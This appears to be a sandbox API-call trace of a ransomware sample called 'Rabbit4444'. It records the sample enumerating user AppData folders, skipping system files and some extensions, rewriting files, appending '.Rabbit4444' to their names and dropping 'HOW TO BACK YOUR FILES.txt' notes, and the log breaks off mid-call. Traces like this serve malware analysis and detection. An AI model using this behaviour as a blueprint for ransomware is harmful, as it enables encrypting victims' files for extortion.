[0053.562] lstrcpyW (in: lpString1=0x130ebb2, lpString2="TURABIAN.XSL" | out: lpString1="TURABIAN.XSL") returned="TURABIAN.XSL" [0053.562] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL", dwFileAttributes=0x0) returned 1 [0053.562] lstrlenW (lpString="TURABIAN.XSL") returned 12 [0053.562] lstrlenW (lpString="Rabbit4444") returned 10 [0053.562] lstrcmpiW (lpString1="RABIAN.XSL", lpString2="Rabbit4444") returned 1 [0053.562] lstrlenW (lpString=".dll") returned 4 [0053.562] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.562] lstrlenW (lpString=".lnk") returned 4 [0053.562] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.562] lstrlenW (lpString=".ini") returned 4 [0053.562] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.562] lstrlenW (lpString=".sys") returned 4 [0053.562] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.563] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.563] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14487346138) returned 1 [0053.563] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=344662) returned 1 [0053.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0053.563] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0053.563] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x54560, lpName=0x0) returned 0x298 [0053.564] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x54560) returned 0x2b0000 [0053.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0053.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0053.575] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0053.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0053.576] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14488642702) returned 1 [0053.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0053.576] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0053.576] UnmapViewOfFile (lpBaseAddress=0x2b0000) returned 1 [0053.579] CloseHandle (hObject=0x298) returned 1 [0053.579] CloseHandle (hObject=0x278) returned 1 [0053.579] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.Rabbit4444") returned 84 [0053.579] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.580] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e40435, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b1bddb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 0 [0053.580] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0053.580] lstrcpyW (in: lpString1=0x130ebb2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.580] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.580] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.580] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.581] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.581] CloseHandle (hObject=0x278) returned 1 [0053.581] CloseHandle (hObject=0x27c) returned 1 [0053.581] GetCurrentThreadId () returned 0xd98 [0053.581] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6590 [0053.581] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" [0053.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xee618 | out: hHeap=0xe0000) returned 1 [0053.582] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6588 | out: hHeap=0xe0000) returned 1 [0053.582] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns" [0053.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\" [0053.582] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3" [0053.582] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\addins\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.583] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.585] FlushFileBuffers (hFile=0x27c) returned 1 [0053.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.587] CloseHandle (hObject=0x27c) returned 1 [0053.587] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns") returned 48 [0053.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.587] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe94330a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0053.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.587] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.587] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.587] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.587] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208511b9, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x208511b9, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xe94330a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.588] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.588] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.588] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.588] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.588] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94330a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94330a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94330a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.588] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.588] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.588] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94330a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94330a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94330a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.588] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0053.588] lstrcpyW (in: lpString1=0x130eb9a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.588] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\AddIns\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\addins\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.596] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.597] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.597] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.597] CloseHandle (hObject=0x278) returned 1 [0053.597] CloseHandle (hObject=0x27c) returned 1 [0053.597] GetCurrentThreadId () returned 0xd98 [0053.597] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6550 [0053.597] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" [0053.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf1448 | out: hHeap=0xe0000) returned 1 [0053.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6548 | out: hHeap=0xe0000) returned 1 [0053.597] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access" [0053.597] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\" [0053.597] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3" [0053.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.599] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.601] FlushFileBuffers (hFile=0x27c) returned 1 [0053.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.602] CloseHandle (hObject=0x27c) returned 1 [0053.603] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access") returned 48 [0053.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9e4036f4, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe94592e9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0053.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.603] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.603] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.603] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.603] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3385793c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9e4036f4, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0xe94592e9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.603] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.603] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.603] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.603] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.603] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.603] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe94592e9, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe94592e9, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe94592e9, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.603] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.603] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.603] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33c5d8bc, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33c5d8bc, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x3f1c0c3d, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x31000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccessCache.accdb", cAlternateFileName="ACCESS~1.ACC")) returned 1 [0053.603] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.603] lstrcmpiW (lpString1="AccessCache.accdb", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.603] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="Rabbit4444.exe") returned -1 [0053.603] lstrcmpiW (lpString1="AccessCache.accdb", lpString2=".") returned 1 [0053.603] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="..") returned 1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="windows") returned -1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="bootmgr") returned -1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="pagefile.sys") returned -1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="boot") returned -1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ids.txt") returned -1 [0053.604] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="NTUSER.DAT") returned -1 [0053.604] lstrcpyW (in: lpString1=0x130eb9a, lpString2="AccessCache.accdb" | out: lpString1="AccessCache.accdb") returned="AccessCache.accdb" [0053.604] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb", dwFileAttributes=0x0) returned 1 [0053.604] lstrlenW (lpString="AccessCache.accdb") returned 17 [0053.604] lstrlenW (lpString="Rabbit4444") returned 10 [0053.604] lstrcmpiW (lpString1="ache.accdb", lpString2="Rabbit4444") returned -1 [0053.604] lstrlenW (lpString=".dll") returned 4 [0053.604] lstrcmpiW (lpString1="ccdb", lpString2=".dll") returned 1 [0053.604] lstrlenW (lpString=".lnk") returned 4 [0053.604] lstrcmpiW (lpString1="ccdb", lpString2=".lnk") returned 1 [0053.604] lstrlenW (lpString=".ini") returned 4 [0053.604] lstrcmpiW (lpString1="ccdb", lpString2=".ini") returned 1 [0053.604] lstrlenW (lpString=".sys") returned 4 [0053.604] lstrcmpiW (lpString1="ccdb", lpString2=".sys") returned 1 [0053.604] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.605] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.605] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14491530966) returned 1 [0053.605] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=200704) returned 1 [0053.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0053.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0053.605] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x31300, lpName=0x0) returned 0x298 [0053.606] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x31300) returned 0x70000 [0053.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0053.616] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0053.616] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14492712409) returned 1 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0053.616] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0053.616] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.618] CloseHandle (hObject=0x298) returned 1 [0053.618] CloseHandle (hObject=0x278) returned 1 [0053.618] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.Rabbit4444") returned 77 [0053.618] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\access\\accesscache.accdb.rabbit4444"), dwFlags=0x1) returned 1 [0053.619] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3387db8b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3387db8b, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x338a3dd1, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.mdw", cAlternateFileName="")) returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="Rabbit4444.exe") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2=".") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="..") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="windows") returned -1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="bootmgr") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="pagefile.sys") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="boot") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="ids.txt") returned 1 [0053.619] lstrcmpiW (lpString1="System.mdw", lpString2="NTUSER.DAT") returned 1 [0053.619] lstrcpyW (in: lpString1=0x130eb9a, lpString2="System.mdw" | out: lpString1="System.mdw") returned="System.mdw" [0053.619] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Access\\System.mdw", dwFileAttributes=0x0) returned 1 [0053.620] lstrlenW (lpString="System.mdw") returned 10 [0053.620] lstrlenW (lpString="Rabbit4444") returned 10 [0053.620] lstrcmpiW (lpString1="System.mdw", lpString2="Rabbit4444") returned 1 [0053.620] lstrlenW (lpString=".dll") returned 4 [0053.620] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0053.620] lstrlenW (lpString=".lnk") returned 4 [0053.620] lstrcmpiW (lpString1=".mdw", lpString2=".lnk") returned 1 [0053.620] lstrlenW (lpString=".ini") returned 4 [0053.620] lstrcmpiW (lpString1=".mdw", 